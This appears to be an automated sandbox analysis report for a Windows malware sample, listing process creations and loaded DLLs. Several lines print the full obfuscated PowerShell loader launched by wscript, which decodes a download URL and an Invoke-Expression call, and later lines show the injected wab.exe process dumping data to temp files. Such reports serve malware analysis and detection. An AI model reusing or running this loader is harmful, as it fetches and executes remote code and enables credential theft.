                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
